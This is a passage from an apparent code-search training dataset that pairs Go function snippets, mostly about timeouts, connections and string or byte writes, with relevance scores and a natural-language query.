\tcontinue\n\t\t\t// }\n\t\t\tb, err := bf.ReadByte()\n\t\t\tif err != nil {\n\t\t\t\tif err := funcerr(err); err != nil {\n\t\t\t\t\t// log.Printf(\"0, err: %s\", err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// var b byte\n\t\t\t// if n > 0 {\n\t\t\t// \tb = buff[0]\n\t\t\t// } else {\n\t\t\t// \tcontinue\n\t\t\t// }\n\t\t\t// log.Printf(\"0, err: %s, [% X]\", err, buff[:n])\n\t\t\t// if err != nil {\n\t\t\tif err := funcerr(err); err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tif indxb <= 0 {\n\t\t\t\tif b == '\\x02' {\n\t\t\t\t\ttempb[0] = b\n\t\t\t\t\tindxb = 1\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\ttempb[indxb] = b\n\t\t\tindxb++\n\t\t\t// fmt.Printf(\"len: %v, %v\\n\", indxb, int(tempb[2])+5)\n\t\t\tif indxb < 6 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// log.Println(\"2\")\n\t\t\tif b == '\\x03' && (indxb >= int(tempb[2])+5) {\n\t\t\t\t// fmt.Printf(\"tempb final: [% X]\\n\", tempb[:indxb])\n\t\t\t\tselect {\n\t\t\t\tcase <-dev.chQuit:\n\t\t\t\t\t// log.Println(\"3\")\n\t\t\t\t\treturn\n\t\t\t\tcase dev.chRecv <- tempb[0:indxb]:\n\t\t\t\t\t// fmt.Printf(\"tempb final: [% X]\\n\", tempb[:])\n\t\t\t\tcase <-time.After(1 * time.Second):\n\t\t\t\t}\n\t\t\t\tindxb = 0\n\t\t\t}\n\t\t}\n\t}()\n\tlog.Println(\"reading port\")\n}", "func (m *MetricsCacheType) TimedOut() bool {\n\treturn time.Now().Unix()-m.timestamp > CacheTimeOut\n}", "func TimeoutReader(r io.Reader) io.Reader { return &timeoutReader{r, 0} }", "func isCriticalTCP(err error) (ok bool) {\n\tvar netErr net.Error\n\tif errors.As(err, &netErr) && netErr.Timeout() {\n\t\treturn false\n\t}\n\n\tswitch {\n\tcase\n\t\terrors.Is(err, io.EOF),\n\t\terrors.Is(err, net.ErrClosed),\n\t\terrors.Is(err, os.ErrDeadlineExceeded),\n\t\tisConnBroken(err):\n\t\treturn false\n\tdefault:\n\t\treturn true\n\t}\n}", "func IsDeadlineExceeded(err error) bool {\n\treturn status.Code(Cause(err)) == codes.DeadlineExceeded\n}", "func IsTerminal(fd uintptr) bool {\r\n\treturn false\r\n}", "func (d *Dev) ReadTimeout(timeout time.Duration) (int32, error) {\n\t// Wait for the falling edge that indicates the ADC has data.\n\td.mu.Lock()\n\tdefer d.mu.Unlock()\n\tif !d.IsReady() {\n\t\tif !d.data.WaitForEdge(timeout) {\n\t\t\treturn 0, ErrTimeout\n\t\t}\n\t}\n\treturn d.readRaw()\n}", "func (c *minecraftConn) handleReadErr(err error) (recoverable bool) {\n\tvar silentErr *errs.SilentError\n\tif errors.As(err, &silentErr) {\n\t\tc.log.V(1).Info(\"silentErr: error reading next packet, unrecoverable and closing connection\", \"err\", err)\n\t\treturn false\n\t}\n\t// Immediately retry for EAGAIN\n\tif errors.Is(err, syscall.EAGAIN) {\n\t\treturn true\n\t}\n\tvar netErr *net.OpError\n\tif errors.As(err, &netErr) {\n\t\tif netErr.Temporary() {\n\t\t\t// Immediately retry for temporary network errors\n\t\t\treturn true\n\t\t} else if netErr.Timeout() {\n\t\t\t// Read timeout, disconnect\n\t\t\tc.log.Error(err, \"read timeout\")\n\t\t\treturn false\n\t\t} else if errs.IsConnClosedErr(netErr.Err) {\n\t\t\t// Connection is already closed\n\t\t\treturn false\n\t\t}\n\t}\n\t// Immediately break for known unrecoverable errors\n\tif errors.Is(err, io.EOF) || errors.Is(err, io.ErrUnexpectedEOF) ||\n\t\terrors.Is(err, io.ErrNoProgress) || errors.Is(err, io.ErrClosedPipe) ||\n\t\terrors.Is(err, io.ErrShortBuffer) || errors.Is(err, syscall.EBADF) ||\n\t\tstrings.Contains(err.Error(), \"use of closed file\") {\n\t\treturn false\n\t}\n\tc.log.Error(err, \"error reading next packet, unrecoverable and closing connection\")\n\treturn false\n}", "func (r *RLockedFile) IsClosed() bool {\n\tr.mutex.Lock()\n\tdefer r.mutex.Unlock()\n\treturn r.refs == 0\n}", "func IsDeadlineExceeded(err error) bool {\n\treturn errors.Is(err, context.DeadlineExceeded)\n}", "func IsTimeoutError(err error) bool {\n\tif err == nil {\n\t\treturn false\n\t}\n\tswitch err := err.(type) {\n\tcase *url.Error:\n\t\tif err, ok := err.Err.(net.Error); ok {\n\t\t\treturn err.Timeout()\n\t\t}\n\tcase net.Error:\n\t\treturn err.Timeout()\n\t}\n\n\tif strings.Contains(err.Error(), \"use of closed network connection\") {\n\t\treturn true\n\t}\n\treturn false\n}", "func isServerProxyReadTimeoutDirective(directive string) bool {\n\tif isEqualString(directive, ServerProxyReadTimeoutDirective) {\n\t\treturn true\n\t}\n\treturn false\n}", "func (ctn *Connection) isIdle() bool {\n\treturn ctn.idleTimeout > 0 && time.Now().After(ctn.idleDeadline)\n}", "func (ctn *Connection) isIdle() bool {\n\treturn ctn.idleTimeout > 0 && time.Now().After(ctn.idleDeadline)\n}", "func blockUntilFileExists(fileName string) (os.FileInfo, error) {\n\tctx, _ := context.WithTimeout(context.Background(), time.Minute*5)\n\tfor {\n\t\tif f, err := os.Stat(fileName); err == nil {\n\t\t\treturn f, nil\n\t\t}\n\n\t\tselect {\n\t\tcase <-time.After(time.Millisecond * 200):\n\t\t\tcontinue\n\t\tcase <-ctx.Done():\n\t\t\treturn nil, errors.New(fmt.Sprintf(\"TimeoutError for waiting log file: %s\", fileName))\n\t\t}\n\t}\n}", "func (o *Content) GetReadTimeout() int32 {\n\tif o == nil || o.ReadTimeout.Get() == nil {\n\t\tvar ret int32\n\t\treturn ret\n\t}\n\treturn *o.ReadTimeout.Get()\n}", "func (manager Manager) ReadTimeout() time.Duration {\n\treturn manager.viperConfig.GetDuration(readTimeout)\n}", "func IsNetworkTimeoutErr(err error) bool {\n\t// if it's a network timeout error\n\topErr, ok := err.(*net.OpError)\n\tif ok {\n\t\treturn opErr.Timeout()\n\t}\n\n\treturn false\n}", "func (h *handle) poll() error {\n\tvar pollinfo = [2]unix.PollFd{\n\t\t{Fd: int32(h.fd), Events: unix.POLLIN, Revents: 0},\n\t\t{Fd: int32(h.breakLoopfd), Events: unix.POLLIN, Revents: 0},\n\t}\n\tn, _, err := syscall.Syscall(unix.SYS_POLL, uintptr(unsafe.Pointer(&pollinfo)), uintptr(2), uintptr(h.pollTimeout))\n\tswitch {\n\tcase n > 0:\n\t\t/*\n\t\t\tcheck if we have told to break from loop, before checking if we can read.\n\t\t\twe don't want to keep reading while the user has requested to break from loop.\n\t\t*/\n\t\tif pollinfo[1].Revents == unix.POLLIN {\n\t\t\th.resetBreakLoop()\n\t\t\treturn eBreakLoop\n\t\t}\n\t\tif pollinfo[0].Revents == unix.POLLIN {\n\t\t\t// we have something to read\n\t\t\treturn nil\n\t\t}\n\t\t// something else other than \"you can read on these descriptors\".\n\t\tif pollinfo[0].Revents != 0 {\n\t\t\tif pollinfo[0].Revents&unix.POLLNVAL != 0 {\n\t\t\t\t// socket closed!\n\t\t\t\treturn unix.EINVAL\n\t\t\t}\n\t\t\t// there is no current known possiblilities for this error to ever occur on\n\t\t\t// AF_PACKET socket. at this point you can even open an issue on GitHub :P\n\t\t\tif pollinfo[0].Revents&(unix.POLLHUP|unix.POLLRDHUP) != 0 {\n\t\t\t\t// socket hangup! check if interface is still alive\n\t\t\t\tif err := h.interfaceAlive(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\treturn errors.New(\"AF_POCKET socket hangup\")\n\t\t\t}\n\t\t\tif pollinfo[0].Revents&unix.POLLERR != 0 {\n\t\t\t\tv, err := unix.GetsockoptInt(h.fd, unix.SOL_SOCKET, unix.SO_ERROR)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn os.NewSyscallError(\"getsockopt.SO_ERROR\", err)\n\t\t\t\t}\n\t\t\t\treturn os.NewSyscallError(\"poll.AF_PACKET\", unix.Errno(v))\n\t\t\t}\n\t\t}\n\t\tif pollinfo[1].Revents != 0 {\n\t\t\tif pollinfo[0].Revents&unix.POLLNVAL != 0 {\n\t\t\t\t// socket closed!\n\t\t\t\treturn unix.EINVAL\n\t\t\t}\n\t\t}\n\tcase err != 0:\n\t\t// if we've received a signal, check if it's break loop\n\t\t// and return break loop error\n\t\tif err == unix.EINTR && h.shouldBreakLoop() {\n\t\t\th.resetBreakLoop()\n\t\t\treturn eBreakLoop\n\t\t}\n\t\treturn os.NewSyscallError(\"poll\", err)\n\tdefault:\n\t\tif h.pollTimeout > 0 {\n\t\t\treturn eTIMEDOUT\n\t\t}\n\t\tif h.pollTimeout == -1 {\n\t\t\tif err := h.interfaceAlive(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\t// if none of the above occured return EAGAIN\n\treturn eAGAIN\n}", "func (t *Tail) Scan() bool {\n\tvar err error\n\tif t.done {\n\t\treturn false\n\t}\n\tif t.init {\n\t\t// there is no pos file Start reading from the end of the file\n\t\tif t.InitialReadPositionEnd && t.isCreatePosFile {\n\t\t\tt.fileFd.Seek(0, os.SEEK_END)\n\t\t}\n\t\tt.data = make(chan []byte, 1)\n\t\tt.scanner = bufio.NewScanner(t.fileFd)\n\t\tt.init = false\n\t}\n\n\tfor {\n\t\tif t.scanner.Scan() {\n\t\t\tt.data <- t.scanner.Bytes()\n\t\t\treturn true\n\t\t}\n\n\t\tif err := t.scanner.Err(); err != nil {\n\t\t\tt.err = err\n\t\t\treturn false\n\t\t}\n\n\t\tt.Stat.Offset, err = t.fileFd.Seek(0, os.SEEK_CUR)\n\t\tif err != nil {\n\t\t\tt.err = err\n\t\t\treturn false\n\t\t}\n\n\t\tfd, err := os.Open(t.file)\n\t\tif os.IsNotExist(err) {\n\t\t\ttime.Sleep(time.Millisecond * 10)\n\t\t} else if err != nil {\n\t\t\tt.err = err\n\t\t\treturn false\n\t\t}\n\t\tfdStat, err := fd.Stat()\n\t\tif err != nil {\n\t\t\tt.err = err\n\t\t\treturn false\n\t\t}\n\t\tstat := fdStat.Sys().(*syscall.Stat_t)\n\t\tif stat.Ino != t.Stat.Inode {\n\t\t\tt.Stat.Inode = stat.Ino\n\t\t\tt.Stat.Offset = 0\n\t\t\tt.Stat.Size = stat.Size\n\t\t\tt.fileFd.Close()\n\t\t\tt.fileFd = fd\n\t\t} else {\n\t\t\tif stat.Size < t.Stat.Size {\n\t\t\t\tt.fileFd.Seek(0, os.SEEK_SET)\n\t\t\t}\n\t\t\tt.Stat.Size = stat.Size\n\t\t\ttime.Sleep(time.Millisecond * 10)\n\t\t\tfd.Close()\n\t\t}\n\t\tt.scanner = bufio.NewScanner(t.fileFd)\n\n\t\terr = posUpdate(t)\n\t\tif err != nil {\n\t\t\tt.err = err\n\t\t\treturn false\n\t\t}\n\t}\n}", "func canRetry(args interface{}, err error) bool {\n\t// No leader errors are always safe to retry since no state could have\n\t// been changed.\n\tif structs.IsErrNoLeader(err) {\n\t\treturn true\n\t}\n\n\t// Reads are safe to retry for stream errors, such as if a server was\n\t// being shut down.\n\tinfo, ok := args.(structs.RPCInfo)\n\tif ok && info.IsRead() && lib.IsErrEOF(err) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (c *Connection) checkForRetry(err error) bool {\n\treturn err == io.EOF\n}", "func isFdConsumingAddr(addr ma.Multiaddr) bool {\n\tfirst, _ := ma.SplitFunc(addr, func(c ma.Component) bool {\n\t\treturn c.Protocol().Code == ma.P_CIRCUIT\n\t})\n\n\t// for safety\n\tif first == nil {\n\t\treturn true\n\t}\n\n\t_, err1 := first.ValueForProtocol(ma.P_TCP)\n\t_, err2 := first.ValueForProtocol(ma.P_UNIX)\n\treturn err1 == nil || err2 == nil\n}", "func (p *TSocket) IsOpen() bool {\n\tif p.conn == nil {\n\t\treturn false\n\t}\n\treturn true\n}", "func (o *Content) HasConnectionTimeout() bool {\n\tif o != nil && o.ConnectionTimeout.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (remote *RemoteNode) Flooded() bool {\n\treturn time.Since(remote.LastRequestTo) < MinNodeQueryInterval\n}", "func (q *queue) readReadiness(t *linux.KernelTermios) waiter.EventMask {\n\tq.mu.Lock()\n\tdefer q.mu.Unlock()\n\tif q.readBuf.Len() > 0 && q.readable {\n\t\treturn waiter.EventIn\n\t}\n\treturn waiter.EventMask(0)\n}", "func waitTimeout(wg *sync.WaitGroup, timeout time.Duration) bool {\n\tc := make(chan struct{})\n\tgo func() {\n\t\tdefer close(c)\n\t\twg.Wait()\n\t}()\n\n\tselect {\n\tcase <-c:\n\t\treturn false\n\tcase <-time.After(timeout):\n\t\treturn true\n\t}\n}", "func (b *recBatch) isTimedOut(limit time.Duration) bool {\n\tif limit == 0 {\n\t\treturn false\n\t}\n\treturn time.Since(b.records[0].Timestamp) > limit\n}", "func (dc DeadlineConn) Read(data []byte) (int, error) {\n\tcount := 0\n\terr := dc.Conn.SetReadDeadline(time.Now().Add(dc.timeout))\n\tif err != nil {\n\t\treturn count, err\n\t}\n\t// don't bother with resetting the deadline since it will be set\n\t// again next time we call Read()\n\treturn dc.Conn.Read(data)\n}", "func (f *FakelogicalReader) ReadCalled() bool {\n\treturn len(f.ReadCalls) != 0\n}", "func isHTTPTimeout(err error) bool {\n\tif netErr, ok := err.(interface {\n\t\tTimeout() bool\n\t}); ok && netErr.Timeout() {\n\t\treturn true\n\t} else if strings.Contains(err.Error(), \"use of closed network connection\") { //To deprecate when using GO > 1.5\n\t\treturn true\n\t}\n\treturn false\n}", "func TestNotIdle(t *testing.T) {\n\tdir := test_helpers.InitFS(t)\n\tmnt := dir + \".mnt\"\n\terr := test_helpers.Mount(dir, mnt, false, \"-extpass\", \"echo test\", \"-i=100ms\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = ioutil.WriteFile(mnt+\"/foo\", []byte(\"foo\"), 0600)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Read every 10 milliseconds for a total of 1 second\n\tfor i := 1; i < 100; i++ {\n\t\t_, err = ioutil.ReadFile(mnt + \"/foo\")\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"iteration %d failed: %v\", i, err)\n\t\t}\n\t\ttime.Sleep(10 * time.Millisecond)\n\t}\n\t// Keep a file handle open for 1 second\n\tfd, err := os.Open(mnt + \"/foo\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\ttime.Sleep(1 * time.Second)\n\tbuf := make([]byte, 100)\n\t_, err = fd.Read(buf)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfd.Close()\n\t// All good.\n\ttest_helpers.UnmountPanic(mnt)\n}", "func (c *Conn) failed() bool {\n\tselect {\n\tcase <-c.connectDone:\n\t\treturn c.connectErr != nil\n\tdefault:\n\t\treturn false\n\t}\n}", "func (c Choco) Expired() bool {\n\treturn time.Since(c.TimeStamp) > time.Second\n}", "func (fd *failureDetector) timeout() {\n\tfd.logln(\"timeout\")\n\tfd.m.Lock()\n\tdefer fd.m.Unlock()\n\tif !fd.aliveSuspectedIntersectionEmpty() {\n\t\tfd.delay = fd.delay + fd.delta\n\t\tfd.logf(\"new delay %d\\n\", fd.delay)\n\t\tfd.timeoutSignal = time.NewTicker(fd.delay)\n\t}\n\tfor _, node := range fd.config.Nodes() {\n\t\tif !fd.alive[node] && !fd.suspected[node] {\n\t\t\tfd.suspected[node] = true\n\t\t\tfd.logf(\"suspect %v\\n\", node)\n\t\t\tfd.sr.Suspect(node)\n\t\t} else if fd.alive[node] && fd.suspected[node] {\n\t\t\tdelete(fd.suspected, node)\n\t\t\tfd.logf(\"restore %v\\n\", node)\n\t\t\tfd.sr.Restore(node)\n\t\t}\n\n\t\tfd.hbChan <- node\n\t}\n\tfd.logln(\"fd.alive\", fd.alive)\n\tfd.alive = make(map[*Node]bool)\n}", "func (d *Driver) Expired() bool {\n\tif d.Expiration == 0 {\n\t\treturn false\n\t}\n\treturn time.Now().UnixNano() > d.Expiration\n}", "func (mh *eventSourceMessageHolder) fullResetTimeout() bool {\n\tresetTimeout := mh.getResetTimeout()\n\treturn resetTimeout != 0 && time.Now().Unix() > resetTimeout\n}", "func (dock *Dock) awaitSocket(patience time.Duration) error {\n\ttimeout := time.Now().Add(patience)\n\tdone := false\n\tfor !done {\n\t\tdone = time.Now().After(timeout)\n\t\tsockStat, err := os.Stat(dock.GetSockPath())\n\t\tif os.IsNotExist(err) {\n\t\t\t// continue\n\t\t} else if err != nil {\n\t\t\tpanic(err)\n\t\t} else if (sockStat.Mode() & os.ModeSocket) != 0 {\n\t\t\t// still have to check if it's dialable; docker daemon doesn't even try to remove socket files when it's done.\n\t\t\tdial, err := net.Dial(\"unix\", dock.GetSockPath())\n\t\t\tif err == nil {\n\t\t\t\t// success!\n\t\t\t\tdial.Close()\n\t\t\t\treturn nil\n\t\t\t}\n\t\t} else {\n\t\t\t// file exists but isn't socket; do not want\n\t\t\treturn fmt.Errorf(\"not a socket in place of docker socket\")\n\t\t}\n\t\tif !done {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t}\n\treturn fmt.Errorf(\"timeout waiting for docker socket\")\n}", "func (f *FakelogicalReader) ReadCalledN(n int) bool {\n\treturn len(f.ReadCalls) >= n\n}", "func (e *PermissionDeniedError) Timeout() bool { return false }", "func proxyOpen(item ProxyItem) bool {\n\tvar ipPort = fmt.Sprintf(\"%s:%d\", item.IP, item.Port)\n\t_, err := net.DialTimeout(\"tcp\", ipPort, time.Second)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn true\n}", "func (r *timeoutReadCloser) Read(b []byte) (int, error) {\n\ttimer := time.NewTimer(r.duration)\n\tc := make(chan readResult, 1)\n\n\tgo func() {\n\t\tn, err := r.reader.Read(b)\n\t\ttimer.Stop()\n\t\tc <- readResult{n: n, err: err}\n\t}()\n\n\tselect {\n\tcase data := <-c:\n\t\treturn data.n, data.err\n\tcase <-timer.C:\n\t\treturn 0, &ResponseTimeoutError{TimeoutDur: r.duration}\n\t}\n}", "func (o *LocalDatabaseProvider) HasNetworkInactivityTimeoutEnabled() bool {\n\tif o != nil && o.NetworkInactivityTimeoutEnabled != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func waitTimeout(wg *sync.WaitGroup, timeout time.Duration) bool {\n\tc := make(chan struct{})\n\n\tgo func() {\n\t\tdefer close(c)\n\t\twg.Wait()\n\t}()\n\n\tselect {\n\tcase <-c:\n\t\treturn false // completed normally\n\tcase <-time.After(timeout):\n\t\treturn true // timed out\n\t}\n}", "func setReadDeadline(c net.Conn, duration uint) {\n\t// disable timeout used for test failure\n\ttimeoutDuration := time.Duration(time.Duration(duration) * time.Second)\n\tc.SetReadDeadline(time.Now().Add(timeoutDuration))\n}", "func waitTimeout(wg *sync.WaitGroup, timeout time.Duration) bool {\n\tc := make(chan struct{})\n\tgo func() {\n\t\tdefer close(c)\n\t\twg.Wait()\n\t}()\n\tselect {\n\tcase <-c:\n\t\treturn false // wait succeeded\n\tcase <-time.After(timeout):\n\t\treturn true // wait timed out\n\t}\n}", "func ReadTimeout(timeout time.Duration) func(*Server) {\n\treturn func(s *Server) {\n\t\ts.server.ReadTimeout = timeout\n\t}\n}", "func optionalTimeout(deadline *time.Time) <-chan time.Time {\n\tvar timeout <-chan time.Time\n\tif deadline != nil {\n\t\ttimeout = time.NewTimer(time.Until(*deadline)).C\n\t}\n\treturn timeout\n}", "func (t *deadlineTimer) Exceeded() bool {\n\tif t.t == nil {\n\t\treturn true\n\t}\n\tselect {\n\tcase <-t.t.C:\n\tdefault:\n\t\treturn false\n\t}\n\n\tt.Stop()\n\n\treturn true\n}", "func fileHandleExists(fh source.FileHandle) (bool, error) {\n\t_, err := fh.Read()\n\tif err == nil {\n\t\treturn true, nil\n\t}\n\tif os.IsNotExist(err) {\n\t\treturn false, nil\n\t}\n\treturn false, err\n}" ]
[ "0.6929368", "0.65608245", "0.6201191", "0.6042862", "0.5884998", "0.58426654", "0.5810461", "0.5719689", "0.57021224", "0.56685066", "0.56480896", "0.56158537", "0.55566245", "0.55403715", "0.55130386", "0.5479078", "0.5474698", "0.5410281", "0.5392653", "0.53810465", "0.5318475", "0.5312125", "0.5310031", "0.52761865", "0.5256525", "0.52421016", "0.5233998", "0.5212756", "0.521107", "0.52105296", "0.51803696", "0.51762605", "0.51672965", "0.51560843", "0.5148718", "0.5139728", "0.5123139", "0.50944775", "0.50920194", "0.50792056", "0.50754946", "0.5072704", "0.507132", "0.5069037", "0.50663614", "0.5063658", "0.5040996", "0.5040815", "0.50399137", "0.50158525", "0.50005674", "0.4999421", "0.4998296", "0.49958935", "0.49849936", "0.49749064", "0.49745107", "0.49724028", "0.49688792", "0.49640423", "0.49617085", "0.49562368", "0.49562368", "0.49400228", "0.49377728", "0.49351534", "0.4931334", "0.49293748", "0.49231622", "0.492139", "0.49140546", "0.49113733", "0.49103716", "0.49073377", "0.48985553", "0.48952666", "0.48876685", "0.48860702", "0.48845637", "0.48832148", "0.48793185", "0.48745227", "0.48664156", "0.48556742", "0.48411208", "0.48315594", "0.48300767", "0.48266116", "0.48238942", "0.48154497", "0.48145986", "0.48037684", "0.47925907", "0.4790824", "0.47843087", "0.47804722", "0.47699302", "0.47688043", "0.47652793", "0.4761305" ]
0.59510916
4
Write a string to the file descriptor, return the number of bytes written.
func puts(fd int, s string) int { n, err := syscall.Write(fd, []byte(s)) if err != nil { panic(fmt.Sprintf("puts error %s\n", err)) } return n }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (fs *Fs) WriteString(file *os.File, string string) (int, error) {\n\treturn file.WriteString(string) // #nosec G304\n}", "func (a ReverseHttpFile) WriteString(s string) (int, error) {\n\treturn 0, syscall.EPERM\n}", "func (r *RingBuffer) WriteString(s string) (n int, err error) {\n\tbs := String2Bytes(s)\n\n\tr.mu.Lock()\n\tdefer r.mu.Unlock()\n\tn, err = r.write(bs)\n\treturn n, err\n}", "func writeString(w io.Writer, s string) (n int, err error) {\n\ttype stringWriter interface {\n\t\tWriteString(string) (n int, err error)\n\t}\n\tif sw, ok := w.(stringWriter); ok {\n\t\treturn sw.WriteString(s) // Avoid copy string\n\t}\n\treturn w.Write([]byte(s)) // Using temporary copy\n}", "func (res Responder) WriteString(s string) int {\n\tn := res.writeInline(binDOLLAR, strconv.Itoa(len(s)))\n\tm, _ := res.b.WriteString(s)\n\tres.b.Write(binCRLF)\n\treturn n + m + 2\n}", "func FileWriteString(f *os.File, s string) (int, error)", "func (b *Bytes) WriteString(s string) (int, error) {\n\tn := b.Len()\n\tb.grow(n + len(s))\n\tcopy((*b.p)[n:], s)\n\treturn len(s), nil\n}", "func (b *defaultByteBuffer) WriteString(s string) (n int, err error) {\n\tif b.status&BitWritable == 0 {\n\t\treturn -1, errors.New(\"unwritable buffer, cannot support WriteString\")\n\t}\n\tn = len(s)\n\tb.ensureWritable(n)\n\tcopy(b.buff[b.writeIdx:b.writeIdx+n], s)\n\tb.writeIdx += n\n\treturn\n}", "func WriteString(w Writer, s string) (int, error) {\n\tif w == nil {\n\t\treturn 0, ErrMissingWriter\n\t}\n\treturn io.WriteString(w, s)\n}", "func (c Channel) WriteString(name, value string) error {\n\tcName := C.CString(name)\n\tdefer C.free(unsafe.Pointer(cName))\n\tcValue := C.CString(value)\n\tdefer C.free(unsafe.Pointer(cValue))\n\n\terrno := C.iio_channel_attr_write(c.handle, cName, cValue)\n\tif errno < 0 {\n\t\treturn syscall.Errno(-errno)\n\t}\n\t// otherwise it's the number of bytes, which we're not interested in\n\t// at this time\n\treturn nil\n}", "func write(fd uintptr, p unsafe.Pointer, n int32) int32 {\n\tif fd == 2 { // stderr\n\t\t// Convert to a string, because we know that p won't change during the\n\t\t// call to printstring.\n\t\t// TODO: use unsafe.String instead once we require Go 1.20.\n\t\ts := _string{\n\t\t\tptr: (*byte)(p),\n\t\t\tlength: uintptr(n),\n\t\t}\n\t\tstr := *(*string)(unsafe.Pointer(&s))\n\t\tprintstring(str)\n\t\treturn n\n\t}\n\treturn 0\n}", "func (s *String) Write(p []byte) (n int, err error) {\n\ts.value += string(p)\n\treturn len(p), nil\n}", "func (tf *Temp) WriteString(contents string) (int, error) {\n\ttf.Lock()\n\tdefer tf.Unlock()\n\n\twritten, err := tf.file.WriteString(contents)\n\treturn written, ex.New(err)\n}", "func Write(fd uintptr, p unsafe.Pointer, n int32) int32", "func (h *Hash) WriteString(s string) (int, error) {\n\t// WriteString mirrors Write. See Write for comments.\n\tsize := len(s)\n\tif h.n > 0 && h.n <= bufSize {\n\t\tk := copy(h.buf[h.n:], s)\n\t\th.n += k\n\t\tif h.n < bufSize {\n\t\t\treturn size, nil\n\t\t}\n\t\ts = s[k:]\n\t\th.flush()\n\t}\n\tif len(s) > bufSize {\n\t\th.initSeed()\n\t\tfor len(s) > bufSize {\n\t\t\tptr := (*byte)((*unsafeheader.String)(unsafe.Pointer(&s)).Data)\n\t\t\th.state.s = rthash(ptr, bufSize, h.state.s)\n\t\t\ts = s[bufSize:]\n\t\t}\n\t}\n\tcopy(h.buf[:], s)\n\th.n = len(s)\n\treturn size, nil\n}", "func (r *SizeRotator) WriteString(str string) (n int, err error) {\r\n\treturn r.Write([]byte(str))\r\n}", "func (c *TestConnection) Write(b []byte) (n int, err error) {\n if c.WriteError != nil && c.ThrowWriteErrorAfter == c.TimesWriteCalled {\n return 0, c.WriteError\n }\n\n if c.WriteCount > -1 {\n return c.WriteCount, nil\n }\n\n c.TimesWriteCalled++\n c.Written = append(c.Written, string(b))\n return len(b), nil\n}", "func (w *ByteWriter) WriteString(val string, offset int) (int, error) {\n\t_, err := w.Write([]byte(val), offset)\n\treturn offset + len(val), err\n}", "func (r *RotatingFile) WriteString(s string) (int, error) {\n\tdefer r.lock.Unlock()\n\tr.lock.Lock()\n\treturn r.file.WriteString(s)\n}", "func (req *Request) WriteString(s string) (int, error) {\n\treturn req.res.Write([]byte(s))\n}", "func (g *Generator) WriteString(s string) (int, error) {\n\treturn g.o.Write([]byte(s))\n}", "func (dc *dummyConn) Write(p []byte) (int, error) { return len(p), nil }", "func (c *Ctx) WriteString(s string) (int, error) {\n\tc.Response.AppendBodyString(s)\n\treturn len(s), nil\n}", "func (f *File) Write(b []byte) (n int, err error) {\n\tswitch f.fd {\n\tcase Stdout.fd, Stderr.fd:\n\t\tfor _, c := range b {\n\t\t\tputchar(c)\n\t\t}\n\t\treturn len(b), nil\n\tdefault:\n\t\treturn 0, errUnsupported\n\t}\n}", "func (f stdioFileHandle) Write(b []byte) (n int, err error) {\n\tswitch f {\n\tcase 1, 2: // stdout, stderr\n\t\tfor _, c := range b {\n\t\t\tputchar(c)\n\t\t}\n\t\treturn len(b), nil\n\tdefault:\n\t\treturn 0, ErrUnsupported\n\t}\n}", "func (c *Conn) Write(b []byte) (n int, err error) {\n\treturn syscall.Write(c.fd, b)\n}", "func (l *RedLogger) WriteString(s string) (n int, err error) {\n\treturn l.Write([]byte(s))\n}", "func (rb *recordBuilder) WriteString(s string) (n int, err error) {\n\treturn rb.content.WriteString(s)\n}", "func (cw *chanWriter) Write(b []byte) (int, error) {\n cw.downstream <- b\n\n return len(b), nil\n}", "func (w PrintWriter) Write(p []byte) (int, error) {\n\tw.P(string(bytes.TrimSuffix(p, []byte(\"\\n\"))))\n\treturn len(p), nil\n}", "func (w *wrapper) Write(path string, buff []byte, ofst int64, fd uint64) int {\n\tfh, unlock, ok := w.getFileDescriptorWithLock(fd)\n\tif !ok {\n\t\treturn -fuse.EINVAL\n\t}\n\tif wa, ok := fh.(io.WriterAt); ok {\n\t\tunlock()\n\t\tn, err := wa.WriteAt(buff, ofst)\n\t\tif err != nil {\n\t\t\treturn convertError(err)\n\t\t}\n\t\treturn n\n\t}\n\tdefer unlock()\n\tif _, err := fh.Seek(ofst, io.SeekStart); err != nil {\n\t\treturn convertError(err)\n\t}\n\tn, err := fh.Write(buff)\n\tif err != nil {\n\t\treturn convertError(err)\n\t}\n\treturn n\n}", "func (dm *dataManager) writeString(address uint, str string) (err ProcessException) {\n\tdata := []byte(str)\n\n\terr = dm.process.WriteBytes(address, data)\n\n\treturn\n}", "func WriteString(p thrift.TProtocol, value, name string, field int16) error {\n\treturn WriteStringWithContext(context.Background(), p, value, name, field)\n}", "func TestWrite(t *testing.T) {\n\tmockZooKeeper := &MockZooHandle{\n\t\tzk: mock.Mock{},\n\t}\n\n\tbytes := make([]byte, 3)\n\tff := NewFuseFile(bytes, 0, \"mock/path\", mockZooKeeper)\n\n\tmockZooKeeper.zk.On(\"Set\", \"mock/path\", bytes, int32(-1)).Return(&zk.Stat{DataLength: int32(len(bytes))}, nil)\n\n\t// assert that we send 3 bytes into the writer and status out == fuse.OK\n\tsize, stat := ff.Write(bytes, 0)\n\tassert.Equal(t, uint32(3), size)\n\tassert.Equal(t, fuse.OK, stat)\n}", "func WriteString(data []byte, str string, stype string_t, pos *int, l int) {\n switch stype {\n case NULLSTR:\n checkSize(len(data[*pos:]), len(str))\n // Write the string and then terminate with 0x00 byte.\n copy(data[*pos:], str)\n checkSize(len(data[*pos:]), len(str) + 1)\n *pos += len(str)\n data[*pos] = 0x00\n *pos++\n\n case LENENCSTR:\n // Write the encoded length.\n WriteLenEncInt(data, uint64(len(str)), pos)\n // Then write the string as a FIXEDSTR.\n WriteString(data, str, FIXEDSTR, pos, l)\n\n case 